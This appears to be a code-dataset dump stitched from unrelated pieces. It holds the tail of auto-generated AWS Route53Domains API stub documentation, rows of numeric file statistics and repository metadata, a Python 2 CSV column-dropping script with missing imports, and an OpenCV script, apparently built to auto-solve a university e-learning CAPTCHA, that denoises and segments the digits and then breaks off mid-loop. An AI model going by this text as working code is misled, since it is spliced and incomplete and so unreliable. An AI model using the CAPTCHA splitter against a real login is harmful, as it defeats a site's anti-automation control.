legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
The UpdateDomainContact response includes the following element.
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'OperationId': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
def update_domain_contact_privacy(DomainName=None, AdminPrivacy=None, RegistrantPrivacy=None, TechPrivacy=None):
"""
This operation updates the specified domain contact\'s privacy setting. When privacy protection is enabled, contact information such as email address is replaced either with contact information for Amazon Registrar (for .com, .net, and .org domains) or with contact information for our registrar associate, Gandi.
This operation affects only the contact information for the specified contact type (registrant, administrator, or tech). If the request succeeds, Amazon Route 53 returns an operation ID that you can use with GetOperationDetail to track the progress and completion of the action. If the request doesn\'t complete successfully, the domain registrant will be notified by email.
See also: AWS API Documentation
Exceptions
:example: response = client.update_domain_contact_privacy(
DomainName='string',
AdminPrivacy=True|False,
RegistrantPrivacy=True|False,
TechPrivacy=True|False
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to update the privacy setting for.\n
:type AdminPrivacy: boolean
:param AdminPrivacy: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the admin contact.
:type RegistrantPrivacy: boolean
:param RegistrantPrivacy: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the registrant contact (domain owner).
:type TechPrivacy: boolean
:param TechPrivacy: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the technical contact.
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
The UpdateDomainContactPrivacy response includes the following element.
OperationId (string) --
Identifier for tracking the progress of the request. To use this ID to query the operation status, use GetOperationDetail.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'OperationId': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
def update_domain_nameservers(DomainName=None, FIAuthKey=None, Nameservers=None):
"""
This operation replaces the current set of name servers for the domain with the specified set of name servers. If you use Amazon Route 53 as your DNS service, specify the four name servers in the delegation set for the hosted zone for the domain.
If successful, this operation returns an operation ID that you can use to track the progress and completion of the action. If the request is not completed successfully, the domain registrant will be notified by email.
See also: AWS API Documentation
Exceptions
:example: response = client.update_domain_nameservers(
DomainName='string',
FIAuthKey='string',
Nameservers=[
{
'Name': 'string',
'GlueIps': [
'string',
]
},
]
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to change name servers for.\n
:type FIAuthKey: string
:param FIAuthKey: The authorization key for .fi domains
:type Nameservers: list
:param Nameservers: [REQUIRED]\nA list of new name servers for the domain.\n\n(dict) --Nameserver includes the following elements.\n\nName (string) -- [REQUIRED]The fully qualified host name of the name server.\nConstraint: Maximum 255 characters\n\nGlueIps (list) --Glue IP address of a name server entry. Glue IP addresses are required only when the name of the name server is a subdomain of the domain. For example, if your domain is example.com and the name server for the domain is ns.example.com, you need to specify the IP address for ns.example.com.\nConstraints: The list can contain only one IPv4 and one IPv6 address.\n\n(string) --\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
The UpdateDomainNameservers response includes the following element.
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'OperationId': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
def update_tags_for_domain(DomainName=None, TagsToUpdate=None):
"""
This operation adds or updates tags for a specified domain.
All tag operations are eventually consistent; subsequent operations might not immediately represent all issued operations.
See also: AWS API Documentation
Exceptions
:example: response = client.update_tags_for_domain(
DomainName='string',
TagsToUpdate=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe domain for which you want to add or update tags.\n
:type TagsToUpdate: list
:param TagsToUpdate: A list of the tag keys and values that you want to add or update. If you specify a key that already exists, the corresponding value will be replaced.\n\n(dict) --Each tag includes the following elements.\n\nKey (string) --The key (name) of a tag.\nValid values: A-Z, a-z, 0-9, space, '.:/=+-@'\nConstraints: Each key can be 1-128 characters long.\n\nValue (string) --The value of a tag.\nValid values: A-Z, a-z, 0-9, space, '.:/=+-@'\nConstraints: Each value can be 0-256 characters long.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {}
:returns:
(dict) --
"""
pass
def view_billing(Start=None, End=None, Marker=None, MaxItems=None):
"""
Returns all the domain-related billing records for the current AWS account for a specified period
See also: AWS API Documentation
Exceptions
:example: response = client.view_billing(
Start=datetime(2015, 1, 1),
End=datetime(2015, 1, 1),
Marker='string',
MaxItems=123
)
:type Start: datetime
:param Start: The beginning date and time for the time period for which you want a list of billing records. Specify the date and time in Unix time format and Coordinated Universal time (UTC).
:type End: datetime
:param End: The end date and time for the time period for which you want a list of billing records. Specify the date and time in Unix time format and Coordinated Universal time (UTC).
:type Marker: string
:param Marker: For an initial request for a list of billing records, omit this element. If the number of billing records that are associated with the current AWS account during the specified period is greater than the value that you specified for MaxItems , you can use Marker to return additional billing records. Get the value of NextPageMarker from the previous response, and submit another request that includes the value of NextPageMarker in the Marker element.\nConstraints: The marker must match the value of NextPageMarker that was returned in the previous response.\n
:type MaxItems: integer
:param MaxItems: The number of billing records to be returned.\nDefault: 20\n
:rtype: dict
ReturnsResponse Syntax
{
'NextPageMarker': 'string',
'BillingRecords': [
{
'DomainName': 'string',
'Operation': 'REGISTER_DOMAIN'|'DELETE_DOMAIN'|'TRANSFER_IN_DOMAIN'|'UPDATE_DOMAIN_CONTACT'|'UPDATE_NAMESERVER'|'CHANGE_PRIVACY_PROTECTION'|'DOMAIN_LOCK'|'ENABLE_AUTORENEW'|'DISABLE_AUTORENEW'|'ADD_DNSSEC'|'REMOVE_DNSSEC'|'EXPIRE_DOMAIN'|'TRANSFER_OUT_DOMAIN'|'CHANGE_DOMAIN_OWNER'|'RENEW_DOMAIN'|'PUSH_DOMAIN'|'INTERNAL_TRANSFER_OUT_DOMAIN'|'INTERNAL_TRANSFER_IN_DOMAIN',
'InvoiceId': 'string',
'BillDate': datetime(2015, 1, 1),
'Price': 123.0
},
]
}
Response Structure
(dict) --
The ViewBilling response includes the following elements.
NextPageMarker (string) --
If there are more billing records than you specified for MaxItems in the request, submit another request and include the value of NextPageMarker in the value of Marker .
BillingRecords (list) --
A summary of billing records.
(dict) --
Information for one billing record.
DomainName (string) --
The name of the domain that the billing record applies to. If the domain name contains characters other than a-z, 0-9, and - (hyphen), such as an internationalized domain name, then this value is in Punycode. For more information, see DNS Domain Name Format in the Amazon Route 53 Developer Guide .
Operation (string) --
The operation that you were charged for.
InvoiceId (string) --
The ID of the invoice that is associated with the billing record.
BillDate (datetime) --
The date that the operation was billed, in Unix format.
Price (float) --
The price that you were charged for the operation, in US dollars.
Example value: 12.0
Exceptions
Route53Domains.Client.exceptions.InvalidInput
:return: {
'NextPageMarker': 'string',
'BillingRecords': [
{
'DomainName': 'string',
'Operation': 'REGISTER_DOMAIN'|'DELETE_DOMAIN'|'TRANSFER_IN_DOMAIN'|'UPDATE_DOMAIN_CONTACT'|'UPDATE_NAMESERVER'|'CHANGE_PRIVACY_PROTECTION'|'DOMAIN_LOCK'|'ENABLE_AUTORENEW'|'DISABLE_AUTORENEW'|'ADD_DNSSEC'|'REMOVE_DNSSEC'|'EXPIRE_DOMAIN'|'TRANSFER_OUT_DOMAIN'|'CHANGE_DOMAIN_OWNER'|'RENEW_DOMAIN'|'PUSH_DOMAIN'|'INTERNAL_TRANSFER_OUT_DOMAIN'|'INTERNAL_TRANSFER_IN_DOMAIN',
'InvoiceId': 'string',
'BillDate': datetime(2015, 1, 1),
'Price': 123.0
},
]
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
"""
pass
| 53.189659
| 7,408
| 0.728022
| 34,505
| 251,002
| 5.19345
| 0.037994
| 0.007282
| 0.016161
| 0.025251
| 0.931088
| 0.91894
| 0.910921
| 0.90385
| 0.899369
| 0.895279
| 0
| 0.006875
| 0.162684
| 251,002
| 4,718
| 7,409
| 53.200933
| 0.845776
| 0.974992
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.515625
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
da92f2ef06471acbe1f086a584424338ddbc004c
| 2,485
|
py
|
Python
|
dataframe_parser.py
|
Duke-Autism/ACE
|
a23ef9a6bb98123c7f71ff1afdd85a6d9a5374c7
|
[
"BSD-3-Clause"
] | null | null | null |
dataframe_parser.py
|
Duke-Autism/ACE
|
a23ef9a6bb98123c7f71ff1afdd85a6d9a5374c7
|
[
"BSD-3-Clause"
] | null | null | null |
dataframe_parser.py
|
Duke-Autism/ACE
|
a23ef9a6bb98123c7f71ff1afdd85a6d9a5374c7
|
[
"BSD-3-Clause"
] | null | null | null |
files = glob.glob("*.csv")
names = []
reader = []
header = []
final = []
data_stack = []
print str(os.getcwd())
for file in files:
names.append(file[:-4])
for i in range(0, len(files)):
final_df = pandas.read_csv(files[i]).head(0)
final_df = final_df.drop(final_df.filter(like='_INT').columns, 1)
final_df = final_df.drop(final_df.filter(like='_RAW').columns, 1)
final_df = final_df.drop(final_df.filter(like='_MM').columns, 1)
final_df = final_df.drop(final_df.filter(like='_YYYY').columns, 1)
final_df = final_df.drop(final_df.filter(like='projectid').columns, 1)
final_df = final_df.drop(final_df.filter(like='studyid').columns, 1)
final_df = final_df.drop(final_df.filter(like='environmentName').columns, 1)
final_df = final_df.drop(final_df.filter(like='subjectId').columns, 1)
final_df = final_df.drop(final_df.filter(like='StudySiteId').columns, 1)
final_df = final_df.drop(final_df.filter(like='siteid').columns, 1)
final_df = final_df.drop(final_df.filter(like='Site').columns, 1)
final_df = final_df.drop(final_df.filter(like='SiteNumber').columns, 1)
final_df = final_df.drop(final_df.filter(like='SiteGroup').columns, 1)
final_df = final_df.drop(final_df.filter(like='instanceId').columns, 1)
final_df = final_df.drop(final_df.filter(like='InstanceName').columns, 1)
final_df = final_df.drop(final_df.filter(like='InstanceRepeatNumber').columns, 1)
final_df = final_df.drop(final_df.filter(like='folderid').columns, 1)
final_df = final_df.drop(final_df.filter(like='Folder').columns, 1)
final_df = final_df.drop(final_df.filter(like='FolderSeq').columns, 1)
final_df = final_df.drop(final_df.filter(like='TargetDays').columns, 1)
final_df = final_df.drop(final_df.filter(like='InstanceName').columns, 1)
final_df = final_df.drop(final_df.filter(like='DataPageId').columns, 1)
final_df = final_df.drop(final_df.filter(like='DataPageName').columns, 1)
final_df = final_df.drop(final_df.filter(like='PageRepeatNumber').columns, 1)
final_df = final_df.drop(final_df.filter(like='RecordId').columns, 1)
final_df = final_df.drop(final_df.filter(like='SaveTS').columns, 1)
final_df = final_df.drop(final_df.filter(like='INVSITE').columns, 1)
final_df = final_df.transpose()
data_stack.extend(final_df.index.tolist())
final_df.to_csv(str(os.getcwd())+'/output/'+ files[i])
df = pandas.DataFrame(data_stack)
df.to_csv(str(os.getcwd())+'/output/final.csv')
| 46.886792
| 84
| 0.719517
| 398
| 2,485
| 4.251256
| 0.160804
| 0.355792
| 0.198582
| 0.231678
| 0.736998
| 0.736998
| 0.723995
| 0.695626
| 0.695626
| 0.674941
| 0
| 0.013587
| 0.111469
| 2,485
| 52
| 85
| 47.788462
| 0.752717
| 0
| 0
| 0.046512
| 0
| 0
| 0.111842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.023256
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e51b1424d10e629b02bc8b75407efde5023d7397
| 14,970
|
py
|
Python
|
Flask API/denoise_spliter_v3.py
|
exodustw/NYCU-E3-CAPTCHA-Autowrite
|
73d8e155911e5f36d9a9c5e736e8cb57c8651fc3
|
[
"CC-BY-3.0"
] | null | null | null |
Flask API/denoise_spliter_v3.py
|
exodustw/NYCU-E3-CAPTCHA-Autowrite
|
73d8e155911e5f36d9a9c5e736e8cb57c8651fc3
|
[
"CC-BY-3.0"
] | null | null | null |
Flask API/denoise_spliter_v3.py
|
exodustw/NYCU-E3-CAPTCHA-Autowrite
|
73d8e155911e5f36d9a9c5e736e8cb57c8651fc3
|
[
"CC-BY-3.0"
] | null | null | null |
import cv2
from PIL import Image
import matplotlib.pyplot as plt
import numpy as np
import os
def image_spliter(arr):
#read image
img2 = cv2.imdecode(arr, -1)
width, height, s = img2.shape
#clear the color which does not belong to the number
for la in range(3):
for i in range(width):
for j in range(height):
if img2[i, j, la] < 115:
img2.itemset((i, j, la),255)
#calculate the number of pixel which is not white and ksvd
img2Gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
th3 = cv2.adaptiveThreshold(img2Gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
for a in range(1):
for _width in range(1, width - 1 ,1):
for _height in range(1, height - 1 ,1):
area = 0
for i in range(_width - 1, _width + 2, 1):
for j in range(_height - 1, _height + 2, 1):
if i > width - 1 or j > height - 1 or (i == _width and j == _height):
continue
if th3[i, j] < 233:
area += 1
if area < 4:
th3.itemset((_width,_height),255)
#clear the noisy line
for _width in range(3, width - 2 ,1):
for _height in range(3, height - 2 ,1):
center_color = th3[_width, _height]
ucolor = th3[_width, _height + 1]
dcolor = th3[_width, _height - 1]
lcolor = th3[_width - 1, _height]
rcolor = th3[_width + 1, _height]
ulcolor = th3[_width - 1, _height + 1]
urcolor = th3[_width + 1, _height - 1]
dlcolor = th3[_width - 1, _height - 1]
drcolor = th3[_width + 1, _height - 1]
u2color = th3[_width, _height + 2]
d2color = th3[_width, _height - 2]
l2color = th3[_width - 2, _height]
r2color = th3[_width + 2, _height]
ul2color = th3[_width - 2, _height + 2]
ur2color = th3[_width + 2, _height - 2]
dl2color = th3[_width - 2, _height - 2]
dr2color = th3[_width + 2, _height - 2]
u2l1color = th3[_width - 1, _height + 2]
u2r1color = th3[_width + 1, _height - 2]
d2l1color = th3[_width - 1, _height - 2]
d2r1color = th3[_width + 1, _height - 2]
u1l2color = th3[_width - 2, _height + 1]
u1r2color = th3[_width + 2, _height - 1]
d1l2color = th3[_width - 2, _height - 1]
d1r2color = th3[_width + 2, _height - 1]
flag = 0
if ucolor == center_color:
flag += 1
if dcolor == center_color:
flag += 1
if lcolor == center_color:
flag += 1
if rcolor == center_color:
flag += 1
if ulcolor == center_color:
flag += 1
if urcolor == center_color:
flag += 1
if dlcolor == center_color:
flag += 1
if drcolor == center_color:
flag += 1
if u2color == center_color:
flag += 1
if d2color == center_color:
flag += 1
if l2color == center_color:
flag += 1
if r2color == center_color:
flag += 1
if ul2color == center_color:
flag += 1
if ur2color == center_color:
flag += 1
if dl2color == center_color:
flag += 1
if dr2color == center_color:
flag += 1
if u2l1color == center_color:
flag += 1
if u2r1color == center_color:
flag += 1
if d2l1color == center_color:
flag += 1
if d2r1color == center_color:
flag += 1
if u1l2color == center_color:
flag += 1
if u1r2color == center_color:
flag += 1
if d1l2color == center_color:
flag += 1
if d1r2color == center_color:
flag += 1
if flag < 10:
th3.itemset((_width,_height),255)
#clear the edge
for _width in range(width):
for _height in range(height):
if _width >= width-3 or _width <= 2 or _height >= height-3 or _height <= 2:
th3.itemset((_width,_height),255)
#black white exchange and found the edge of the number
th3 = cv2.bitwise_not(th3)
contours, hierarchy = cv2.findContours(th3, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
img2.fill(255)
arr = []
draw_img = cv2.drawContours(img2.copy(), contours, -1, (0, 0, 255), 1)
for cnt in contours:
x,y,w,h = cv2.boundingRect(cnt)
arr.append([x,y,x+w,y+h])
#find the big rectangle that surrounds the number
arr = np.asarray(arr)
xmin = np.min(arr[:,0])
xmax = np.max(arr[:,2])
ymin = np.min(arr[:,1])
ymax = np.max(arr[:,3])
#find each number's start x and y
x1 = xmin-2
x2 = 21+xmin
x3 = 43+xmin
x4 = 65+xmin
x5 = 95+xmin
if (x5 >= height) :
x5 = height
y1 = ymin
y2 = ymin+35
#draw rectangle(can delete this area)
cv2.rectangle(draw_img,(x1,y1),(x2,y2),(0,255,0),2)
cv2.rectangle(draw_img,(x2,y1),(x3,y2),(0,255,0),2)
cv2.rectangle(draw_img,(x3,y1),(x4,y2),(0,255,0),2)
cv2.rectangle(draw_img,(x4,y1),(x5,y2),(0,255,0),2)
#create four black background images for splitting the number
ch1 = np.zeros((40, 30, 1), dtype = "uint8")
ch2 = np.zeros((40, 30, 1), dtype = "uint8")
ch3 = np.zeros((40, 30, 1), dtype = "uint8")
ch4 = np.zeros((40, 30, 1), dtype = "uint8")
if xmax-xmin <= 90:
for i in range(x1,x2-2,1):
for j in range(y1,y2-1,1):
ch1[j-y1,i-x1] = th3[j,i]
for i in range(x2+1,x3-2,1):
for j in range(y1,y2-1,1):
ch2[j-y1,i-x2-1] = th3[j,i]
for i in range(x3+2,x4,1):
for j in range(y1,y2-1,1):
ch3[j-y1,i-x3-2] = th3[j,i]
for i in range(x4+4,x5,1):
for j in range(y1,y2-1,1):
ch4[j-y1,i-x4-4] = th3[j,i]
elif xmax-xmin <= 91:
#print('here')
for i in range(x1,x2,1):
for j in range(y1,y2-1,1):
ch1[j-y1,i-x1] = th3[j,i]
for i in range(x2+1,x3+2,1):
for j in range(y1,y2-1,1):
ch2[j-y1,i-x2-1] = th3[j,i]
for i in range(x3+3,x4+1,1):
for j in range(y1,y2-1,1):
ch3[j-y1,i-x3-3] = th3[j,i]
for i in range(x4+5,x5,1):
for j in range(y1,y2-1,1):
ch4[j-y1,i-x4-5] = th3[j,i]
else:
#print('there')
for i in range(x1,x2-1,1):
for j in range(y1,y2-1,1):
ch1[j-y1,i-x1] = th3[j,i]
for i in range(x2+3,x3+3,1):
for j in range(y1,y2-1,1):
ch2[j-y1,i-x2-3] = th3[j,i]
for i in range(x3+6,x4+3,1):
for j in range(y1,y2-1,1):
ch3[j-y1,i-x3-6] = th3[j,i]
for i in range(x4+6,x5,1):
for j in range(y1,y2-1,1):
ch4[j-y1,i-x4-6] = th3[j,i]
'''
plt.subplot(241), plt.imshow(img) # original
plt.subplot(242), plt.imshow(th3) # denoise
plt.subplot(243), plt.imshow(draw_img) # position of each number
plt.subplot(245), plt.imshow(ch1) # first number
plt.subplot(246), plt.imshow(ch2) # second number
plt.subplot(247), plt.imshow(ch3) # third number
plt.subplot(248), plt.imshow(ch4) # fourth number
plt.show()
'''
return [ch1, ch2, ch3, ch4]
def image_spliter_bgr(arr):
#read image
img2 = arr
width, height, s = img2.shape
#clear the color which does not belong to the number
for la in range(3):
for i in range(width):
for j in range(height):
if img2[i, j, la] < 115:
img2.itemset((i, j, la),255)
#calculate the number of pixel which is not white and ksvd
img2Gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
th3 = cv2.adaptiveThreshold(img2Gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
for a in range(1):
for _width in range(1, width - 1 ,1):
for _height in range(1, height - 1 ,1):
area = 0
for i in range(_width - 1, _width + 2, 1):
for j in range(_height - 1, _height + 2, 1):
if i > width - 1 or j > height - 1 or (i == _width and j == _height):
continue
if th3[i, j] < 233:
area += 1
if area < 4:
th3.itemset((_width,_height),255)
#clear the noisy line
for _width in range(3, width - 2 ,1):
for _height in range(3, height - 2 ,1):
center_color = th3[_width, _height]
ucolor = th3[_width, _height + 1]
dcolor = th3[_width, _height - 1]
lcolor = th3[_width - 1, _height]
rcolor = th3[_width + 1, _height]
ulcolor = th3[_width - 1, _height + 1]
urcolor = th3[_width + 1, _height - 1]
dlcolor = th3[_width - 1, _height - 1]
drcolor = th3[_width + 1, _height - 1]
u2color = th3[_width, _height + 2]
d2color = th3[_width, _height - 2]
l2color = th3[_width - 2, _height]
r2color = th3[_width + 2, _height]
ul2color = th3[_width - 2, _height + 2]
ur2color = th3[_width + 2, _height - 2]
dl2color = th3[_width - 2, _height - 2]
dr2color = th3[_width + 2, _height - 2]
u2l1color = th3[_width - 1, _height + 2]
u2r1color = th3[_width + 1, _height - 2]
d2l1color = th3[_width - 1, _height - 2]
d2r1color = th3[_width + 1, _height - 2]
u1l2color = th3[_width - 2, _height + 1]
u1r2color = th3[_width + 2, _height - 1]
d1l2color = th3[_width - 2, _height - 1]
d1r2color = th3[_width + 2, _height - 1]
flag = 0
if ucolor == center_color:
flag += 1
if dcolor == center_color:
flag += 1
if lcolor == center_color:
flag += 1
if rcolor == center_color:
flag += 1
if ulcolor == center_color:
flag += 1
if urcolor == center_color:
flag += 1
if dlcolor == center_color:
flag += 1
if drcolor == center_color:
flag += 1
if u2color == center_color:
flag += 1
if d2color == center_color:
flag += 1
if l2color == center_color:
flag += 1
if r2color == center_color:
flag += 1
if ul2color == center_color:
flag += 1
if ur2color == center_color:
flag += 1
if dl2color == center_color:
flag += 1
if dr2color == center_color:
flag += 1
if u2l1color == center_color:
flag += 1
if u2r1color == center_color:
flag += 1
if d2l1color == center_color:
flag += 1
if d2r1color == center_color:
flag += 1
if u1l2color == center_color:
flag += 1
if u1r2color == center_color:
flag += 1
if d1l2color == center_color:
flag += 1
if d1r2color == center_color:
flag += 1
if flag < 10:
th3.itemset((_width,_height),255)
#clear the edge
for _width in range(width):
for _height in range(height):
if _width >= width-3 or _width <= 2 or _height >= height-3 or _height <= 2:
th3.itemset((_width,_height),255)
#black white exchange and found the edge of the number
th3 = cv2.bitwise_not(th3)
contours, hierarchy = cv2.findContours(th3, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
img2.fill(255)
arr = []
draw_img = cv2.drawContours(img2.copy(), contours, -1, (0, 0, 255), 1)
for cnt in contours:
x,y,w,h = cv2.boundingRect(cnt)
arr.append([x,y,x+w,y+h])
#find the big rectangle that surrounds the number
arr = np.asarray(arr)
xmin = np.min(arr[:,0])
xmax = np.max(arr[:,2])
ymin = np.min(arr[:,1])
ymax = np.max(arr[:,3])
#find each number's start x and y
x1 = xmin-2
x2 = 21+xmin
x3 = 43+xmin
x4 = 65+xmin
x5 = 95+xmin
if (x5 >= height) :
x5 = height
y1 = ymin
y2 = ymin+35
#draw rectangle(can delete this area)
cv2.rectangle(draw_img,(x1,y1),(x2,y2),(0,255,0),2)
cv2.rectangle(draw_img,(x2,y1),(x3,y2),(0,255,0),2)
cv2.rectangle(draw_img,(x3,y1),(x4,y2),(0,255,0),2)
cv2.rectangle(draw_img,(x4,y1),(x5,y2),(0,255,0),2)
#create four black background images for splitting the number
ch1 = np.zeros((40, 30, 1), dtype = "uint8")
ch2 = np.zeros((40, 30, 1), dtype = "uint8")
ch3 = np.zeros((40, 30, 1), dtype = "uint8")
ch4 = np.zeros((40, 30, 1), dtype = "uint8")
if xmax-xmin <= 90:
for i in range(x1,x2-2,1):
for j in range(y1,y2-1,1):
ch1[j-y1,i-x1] = th3[j,i]
for i in range(x2+1,x3-2,1):
for j in range(y1,y2-1,1):
ch2[j-y1,i-x2-1] = th3[j,i]
for i in range(x3+2,x4,1):
for j in range(y1,y2-1,1):
ch3[j-y1,i-x3-2] = th3[j,i]
for i in range(x4+4,x5,1):
for j in range(y1,y2-1,1):
ch4[j-y1,i-x4-4] = th3[j,i]
elif xmax-xmin <= 91:
#print('here')
for i in range(x1,x2,1):
for j in range(y1,y2-1,1):
ch1[j-y1,i-x1] = th3[j,i]
for i in range(x2+1,x3+2,1):
for j in range(y1,y2-1,1):
ch2[j-y1,i-x2-1] = th3[j,i]
for i in range(x3+3,x4+1,1):
for j in range(y1,y2-1,1):
ch3[j-y1,i-x3-3] = th3[j,i]
for i in range(x4+5,x5,1):
